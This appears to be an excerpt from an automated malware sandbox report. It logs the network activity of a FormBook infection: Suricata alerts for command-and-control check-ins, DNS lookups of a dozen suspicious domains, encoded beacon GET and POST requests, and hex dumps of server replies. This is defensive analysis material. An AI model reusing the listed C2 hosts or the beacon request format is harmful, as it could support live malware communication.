Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51528 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51566 -> 43.205.198.29:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51558 -> 154.23.178.231:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51545 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51549 -> 149.88.81.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51563 -> 208.91.197.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51561 -> 208.91.197.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51554 -> 101.35.209.183:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51557 -> 154.23.178.231:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51546 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51564 -> 43.205.198.29:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51567 -> 43.205.198.29:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51570 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51552 -> 101.35.209.183:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51562 -> 208.91.197.39:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51571 -> 188.114.97.3:80
Source: DNS query: www.optimismbank.xyz
Source: global traffic | TCP traffic: 192.168.2.10:51525 -> 162.159.36.2:53
Source: Joe Sandbox View | IP Address: 101.35.209.183
Source: Joe Sandbox View | IP Address: 209.74.77.109
Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (12 occurrences)
Source: global traffic | HTTP traffic detected:
HTTP/1.1 200 OK
date: Sat, 11 Jan 2025 02:25:47 GMT
server: Apache
set-cookie: __tad=1736562347.1667970; expires=Tue, 09-Jan-2035 02:25:47 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 576
content-type: text/html; charset=UTF-8
connection: close
Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00
Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e

Source: global traffic | HTTP traffic detected:
HTTP/1.1 200 OK
date: Sat, 11 Jan 2025 02:25:49 GMT
server: Apache
set-cookie: __tad=1736562349.4895586; expires=Tue, 09-Jan-2035 02:25:49 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 576
content-type: text/html; charset=UTF-8
connection: close
Data Raw / Data Ascii: the same 576-byte gzip body as the response above

Source: global traffic | HTTP traffic detected:
HTTP/1.1 200 OK
date: Sat, 11 Jan 2025 02:25:52 GMT
server: Apache
set-cookie: __tad=1736562352.5933549; expires=Tue, 09-Jan-2035 02:25:52 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 576
content-type: text/html; charset=UTF-8
connection: close
Data Raw / Data Ascii: the same 576-byte gzip body as the first response above
                Source: global traffic | HTTP traffic detected: GET /fev0/?6n=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKn/+Qn9LZj60FJTogwY+WbqWfqijUMg==&P8dT=Gvw8Prk0H4 HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Connection: close
                    Host: www.thaor56.online
                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /98j3/?6n=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbyhLLQuZT4Au5NQMQhm1oIOAMIGMg==&P8dT=Gvw8Prk0H4 HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Connection: close
                    Host: www.optimismbank.xyz
                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /r3zg/?P8dT=Gvw8Prk0H4&6n=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06bVBzroOuQGNKcNgifQ36nJgHTvH4A== HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Connection: close
                    Host: www.greenthub.life
                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /n2c9/?6n=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvFKcHVyRNQ0lpxItwqxseE7Zdzalg==&P8dT=Gvw8Prk0H4 HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Connection: close
                    Host: www.laohub10.net
                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /uf7y/?P8dT=Gvw8Prk0H4&6n=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7goc5xtOfckJoEDkF4EtN7gOpTNuRUA== HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Connection: close
                    Host: www.bankseedz.info
                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZC8haYSThO7dC1CsRTUMY0QRbxSNQ==&P8dT=Gvw8Prk0H4 HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Connection: close
                    Host: www.madhf.tech
                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /hkgx/?6n=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUvSVPlvrZOPxTHwBspwPrhhwxEcqkEw==&P8dT=Gvw8Prk0H4 HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Connection: close
                    Host: www.xcvbj.asia
                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /31pt/?6n=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0BgzzdODOQRhsaLMWye0XS2e8Pang==&P8dT=Gvw8Prk0H4 HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Connection: close
                    Host: www.yc791022.asia
                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /p3j6/?6n=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWq9PBiy69Y2nadeDtRJ0gD55AbRoA==&P8dT=Gvw8Prk0H4 HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Connection: close
                    Host: www.43kdd.top
                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /hxi5/?6n=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECON3mfxJeBtjbn7k9Vw2XGkLNgd8mA==&P8dT=Gvw8Prk0H4 HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Connection: close
                    Host: www.jcsa.info
                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /j8pv/?P8dT=Gvw8Prk0H4&6n=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jcEPeQmL51Me3DwZ/KAlDYaGirikg== HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Connection: close
                    Host: www.1secondlending.one
                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /swhs/?6n=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0BhNgyFEMOmWGxKSf7yVXLPttL2EQ==&P8dT=Gvw8Prk0H4 HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Connection: close
                    Host: www.zkdamdjj.shop
                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | DNS traffic detected: DNS query: www.thaor56.online
                Source: global traffic | DNS traffic detected: DNS query: www.optimismbank.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.greenthub.life
                Source: global traffic | DNS traffic detected: DNS query: www.laohub10.net
                Source: global traffic | DNS traffic detected: DNS query: www.bankseedz.info
                Source: global traffic | DNS traffic detected: DNS query: www.madhf.tech
                Source: global traffic | DNS traffic detected: DNS query: www.xcvbj.asia
                Source: global traffic | DNS traffic detected: DNS query: www.yc791022.asia
                Source: global traffic | DNS traffic detected: DNS query: www.43kdd.top
                Source: global traffic | DNS traffic detected: DNS query: www.jcsa.info
                Source: global traffic | DNS traffic detected: DNS query: www.1secondlending.one
                Source: global traffic | DNS traffic detected: DNS query: www.zkdamdjj.shop
                Source: unknown | HTTP traffic detected: POST /98j3/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate, br
                    Cache-Control: no-cache
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 191
                    Connection: close
                    Host: www.optimismbank.xyz
                    Origin: http://www.optimismbank.xyz
                    Referer: http://www.optimismbank.xyz/98j3/
                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                    Data Raw: 36 6e 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 5a 74 78 75 65 35 57 6d 69 48 55 59 31 75 53 2b 47 31 6f 4a 62 6f 35 2f 54 32 4f 5a 46 2f 7a 48 58 6c 63 4b 41 64 45 52 49 6a 50 4a 75 62 46 61 65 4e 6e 64 30 59 79 64 34 57 79 76 48 62 4f 42 62 59 64 79 64 66 4c 45 50 49 62 6b 54 4b 4e 52 4f 54 6f 76 75 59 68 75 4a 41 49 75 31 5a 30 59 48 37 67 42 58 63 43 42 42 4f 61 49 34 67 6b 32 47 62 34 76 48 33 6c 36 51 46 4d 67 41 62 66 43 58 55 6e 45 5a 31 35 51 74 39 6b 51 6e 2b 48 70 6f 42 77 4d 70 45 55 71 41 76 65 39 33 6d 7a 58 62 41 6e 43 39 6c 4b 35 77 50 30 75 44 32 64 76
                    Data Ascii: 6n=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMpEUqAve93mzXbAnC9lK5wP0uD2dv
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 02:24:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 
30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:25:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:25:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:25:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 